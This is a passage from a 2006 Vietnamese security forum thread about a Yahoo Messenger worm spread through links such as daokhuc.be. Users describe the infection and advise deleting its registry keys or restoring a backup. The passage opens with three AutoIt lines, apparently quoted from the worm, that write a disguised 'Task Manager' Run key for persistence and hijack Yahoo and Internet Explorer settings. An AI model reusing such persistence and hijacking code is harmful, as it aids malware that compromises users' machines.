RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "Dao Khuc Community :: Chut gi de nho...")
|
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
03/09/2006 09:17:36 (+0700) | #27 | 20261 |
chaoga
Member
|
|
0 |
|
|
Joined: 02/09/2006 21:57:07
Messages: 1
Offline
|
|
Mình cũng tình cờ nhấp vào trang daokhuc.be hôm nay và đã bị virus tấn công hết lỗi thoát. anh em có cách nào triệt con virus tình cơ này ko?
không những nó send cho hàng loạt people in friendlist, nó có set Home Page cho mình nữa chứ. mình ko dc thâm hỉu về máy tính cho lắm, vào internet options nhưng cái homepage bị disable rồi. ai biết set homepage lại không?
chán wá chán wá |
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
03/09/2006 09:40:05 (+0700) | #28 | 20265 |
|
_HITMAN_
Member
|
|
0 |
|
|
Joined: 27/06/2006 01:36:31
Messages: 24
Offline
|
|
| Như bác hung1910 nói , vào registry xoá hết mấy cái khoá đó , hiện giờ thì làm thủ công vậy thôi , tui củng bị nhiễm , may là mới hôm qua tạo file ghost nên bây giờ ghost lại ko sao . Hình như ngoài cái link daokhuc.be thì còn có cái http://minhnhut.be nữa ??? |
|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thảo luận virus, trojan, spyware, worm...
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
![[WWW]](/hvaonline/templates/viet/images/icon_www.gif "[www]"){kind=icon}
![[Yahoo!]](/hvaonline/templates/viet/images/icon_yim.gif "[YIM]"){kind=icon}
![[Email]](/hvaonline/templates/viet/images/icon_email.gif "[E-mai]"){kind=icon}
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")